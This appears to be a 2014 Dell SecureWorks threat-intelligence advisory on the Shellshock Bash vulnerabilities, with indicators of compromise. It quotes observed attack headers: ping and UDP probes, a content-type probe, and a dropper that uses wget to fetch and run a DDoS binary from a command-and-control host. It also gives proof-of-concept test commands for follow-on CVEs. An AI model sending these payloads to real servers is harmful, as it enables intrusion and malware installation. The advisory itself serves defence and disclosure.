On September 24, 2014, the Bash command injection vulnerability described by CVE-2014-6271 was publicly disclosed.
The Dell SecureWorks® Counter Threat Unit™ (CTU) research team released a set of countermeasures to its iSensor devices (Dell SecureWorks' proprietary Intrusion Protection/Detection systems) to address this vulnerability, as well as related vulnerabilities that were identified in the following days.
As of Monday, September 29, 2014, Dell SecureWorks iSensor devices repelled more than 140,000 scanning and exploit attempts. Based on telemetry provided by the countermeasures, CTU cyber threat intelligence researchers identified scanning patterns being used by threat actors and security researchers to identify vulnerable systems, as well as the origin of these patterns. Threat actors have also attempted to install malware on vulnerable systems.
Vulnerability scanning via pings
In this scanning method, an individual sends exploitation attempts to web servers that return a small amount of data back to a system controlled by the individual. These pings can confirm that the command executed successfully on the target system and that the target system is vulnerable. CTU researchers have observed two types of pings for this vulnerability:
- ICMP ping — In ICMP ping examples, the individual submits the following type of payload to a vulnerable device:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0 User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138 Accept: */*
- UDP ping — To use the UDP network protocol to confirm that a target system is vulnerable to CVE-2014-6271, an individual sends an HTTP request with a header resembling the following:
User-Agent: () { :;}; echo shellshock-scan > /dev/udp/
/ This method uses the 'udp' Bash keyword to send the 'shellshock-scan' text to the target system.
Vulnerability scanning via response modification
Individuals attempt to modify the content-type of the server response to determine if a target system is vulnerable. This approach is stealthier than pings because it does not generate network traffic aside from the existing TCP connection used to send the exploit.
GET / HTTP/1.1 User-Agent: () { :; }; echo -e "Content-Type: text/plain\n"; echo qQQQQQq Host:Accept: */*
Linux malware
CTU researchers have observed CVE-2014-6271 being exploited to deploy malicious software on vulnerable systems. Threat actors attempt remote command execution against vulnerable devices by injecting a 'wget' call within the Cookie, Host, and Referer HTTP headers:
GET / HTTP/1.0 User-Agent: Thanks-Rob Cookie:() { :; }; wget -O /tmp/besh http: // /nginx; chmod 777 /tmp/besh; /tmp/besh; Host:() { :; }; wget -O /tmp/besh http: // /nginx; chmod 777 /tmp/besh; /tmp/besh; Referer:() { :; }; wget -O /tmp/besh http: // /nginx; chmod 777 /tmp/besh; /tmp/besh; Accept: */*
If the exploit is successful, the command downloads and runs a malware binary. In a sample analyzed by CTU researchers, the dropped malware is a Linux-based distributed denial of service (DDoS) tool.
Sources of activity targeting Bash
Figure 1 shows the top sources of Bash scanning activity observed by the CTU research team. Approximately one fourth of the top scanning activity is from security researchers affiliated with Errata Security or from the Shodan search engine.
Figure 1. Origins of scanning activity. (Source: Dell SecureWorks)
Figure 2 shows the distribution of all sources targeting Bash (scanning and attempted attacks) observed by the CTU research team.
Figure 2. Heat map of all Bash command injection events observed by the CTU research team. (Source: Dell SecureWorks)
Secondary Bash vulnerabilities
After CVE-2014-6271 was publicly disclosed, patches for most Linux distributions were published. However, as described on the Shellshock Wikipedia page, five additional CVEs were subsequently assigned as a result of errors in the original patches, as well as new vulnerabilities that are not related to the command injection issue but which may lead to remote code execution:
- CVE-2014-6277 – As of this publication, details of this vulnerability are not publicly available.
- CVE-2014-6278 – As of this publication, details of this vulnerability are not publicly available.
- CVE-2014-7169 – Identified by Tavis Ormandy while investigating the original vulnerability, this additional weakness in the Bash parsing code does not result in a remote code execution scenario. The following proof-of-concept (PoC) command tests for vulnerability to this CVE:
$ X='() { (a)=>\' bash -c "echo date" bash: X: line 1: syntax error near unexpected token `=' bash: X: line 1: `' bash: error importing function definition for `X' [root@ ec2-user]# cat echo Fri Sep 26 01:37:16 UTC 2014 A patched system would not create the file named "echo"" and would give an error: $ X='() { (a)=>\' bash -c "echo date" date $ cat echo cat: echo: No such file or directory
- CVE-2014-7186 – Abuse of EOF file markers to execute Bash commands. The following command tests for vulnerability to this CVE. A vulnerable system will print "CVE-2014-7186 vulnerable, redir_stack" after executing the following command:
bash -c 'true <eof'></eof'>
- CVE-2014-7187 – Abuse of Bash "done"" statements to execute Bash commands. A vulnerable system prints "CVE-2014-7187 vulnerable, word_lineno" after executing the following command:
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
Most Linux distributions have now patched four of the six vulnerabilities listed. The two remaining vulnerabilities are expected to be patched shortly. They are CVE-2014-6277 and CVE-2014-6278. MAC OS X Bash vulnerabilities were patched with the release of OS X bash Update 1.0.
Recommendations
First, users should determine if they have a vulnerable Linux or MAC OS X system within their environment. If so, CTU security intelligence researchers recommend that organizations install the latest patches to vulnerable systems immediately, apply any newly released patches, and use available controls to restrict access using the indicators in Table 1. The IP addresses and URLs in the indicators table may contain malicious content, so consider the risks before opening them in a browser.
Indicator | Type | Context |
89.207.135.125 | IP address | User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138..Accept: */* |
209.126.230.72 | IP address | Erratasec scanning |
198.20.69.74 | IP address | Shodan scanning IP |
162.253.66.76 | IP address | Malware C2 IP address, Linux backdoor DDoS tool dropper - "Thanks-Rob" |
24.251.197.244 | IP address | User-Agent: () { :; }; echo -e "Content-Type: text/plain\n"; echo qQQQQQq |
166.78.61.142 | IP address | User-Agent: () { :;}; echo shellshock-scan > /dev/udp// |
63.128.163.23 | IP address | www.savvis.com - commercial web scanning activity |
73b0d95541c84965fa42c3e257bb349957b3be 626dec9d55efcc6ebcba6fa489 |
SHA256 hash | Linux malware hash |
5924bcc045bb7039f55c6ce29234e29a | MD5 hash | Linux malware hash |
2d3e0be24ef668b85ed48e81ebb50dce50612f b8dce96879f80306701bc41614 |
SHA256 hash | Malware binary |
371b8b20d4dd207f7b3f61bb30a7cb22 | MD5 hash | Malware binary |
http://162.253.66.76/nginx | URL | URL to malware download |
http://162.253.66.76/apache | URL | URL to malware download |
Table 1. Indicators for this threat.